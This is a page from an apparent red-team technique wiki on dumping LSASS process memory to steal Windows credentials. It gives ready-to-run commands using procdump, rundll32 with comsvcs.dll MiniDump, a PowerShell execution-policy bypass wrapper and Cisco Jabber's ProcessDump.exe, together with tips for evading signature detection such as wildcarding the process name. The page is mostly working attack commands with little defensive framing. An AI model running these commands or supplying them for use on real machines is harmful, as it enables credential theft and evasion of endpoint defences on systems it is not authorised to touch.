Gibson> Download Garbage
  • Statement of purpose
  • Techniques
    • Intelligence Gathering
      • O365 Tenant ID
      • Internal domain enumeration
      • O365 email enumeration
      • Passive nmap (smap)
      • Large IP list handling
      • Host Enumeration
    • Initial Access
      • Mail scanning
      • VBA
    • Execution
      • DLL Hijacking
      • Windows LOLBINS
        • DLLs - LOLBIN Execution
        • Executables - LOLBIN Execution
        • Scripts - LOLBIN Execution
    • Privilege Escalation
      • Windows
        • Initial Enumeration
      • Linux
    • Defense Evasion
      • Clear windows event logs
      • Bypassing proxies and firewalls
      • Microsoft Windows Defender
    • Credential Access
      • Extract credentials from LSASS dump
      • Extract credentials from registry hives
      • LSA secrets extraction
      • Dumping LSASS.exe
      • Dumping registry hives
      • Dump the domain (Domain Controllers)
      • Browser cookies & passwords
      • Wi-Fi passwords
      • Clipboard
    • Infrastructure
    • Web application testing
      • XSS - Cross site scripting
        • Weaponising XSS
    • Other
      • Buffer Overflow resources
        • Buffer Overflow Python Template
        • Buffer Overflow Python Fuzzer
      • C Reverse Shell
      • Creating Tiered Storage in Windows 10
      • Default Credentials
    • Red Team Infrastructure
      • Cobalt Strike Team Server
      • Pre-redirector (free domains!)
      • HTTPS Redirector
      • Multi functional WebApp
      • Malleable C2 profiles
      • Gophish Docker reverse proxy
    • Malware
  • Tools
    • Tools
Powered by GitBook
On this page
  • Procdump
  • Comsvcs.dll
  • ProcessDump.exe from Cisco Jabber
  • Task Manager

Was this helpful?

  1. Techniques
  2. Credential Access

Dumping LSASS.exe

Dumping LSASS without mimikatz

Procdump

Procdump is a Microsoft signed administration tool, not typically flagged. 

procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Use -r to clone the process prior to duplicating to avoid reading lsass.exe directly
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

# Use %PID% instead of lsass.exe to avoid string detection
procdump.exe -accepteula -r -ma %PID% FriendlyExport.dmp

# Dynamically get the %PID%
 (ps lsass).id
 (ps ls*).id #cut down to avoid signatures
 
 # combine them all 
 procdump.exe -accepteula -r -ma (ps ls*).id FriendlyExport.dmp

Comsvcs.dll

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump %PID% .\Lsass.dump full

Can be wrapped in a powershell command too:

Powershell.exe -ep bypass -nop -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump %PID% .\Lsass.dump full

ProcessDump.exe from Cisco Jabber

Cisco Jabber comes with a binary called ProcessDump.exe which can be used like procdump.

Location: C:\Program Files (x86)\Cisco Systems\Cisco Jabber\x64\ProcessDump.exe

processdump.exe (ps lsass).id c:\temp\export.dmp

Task Manager

Requires graphical access in addition to administrator rights.

PreviousLSA secrets extractionNextDumping registry hives

Last updated 4 years ago

Was this helpful?

https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/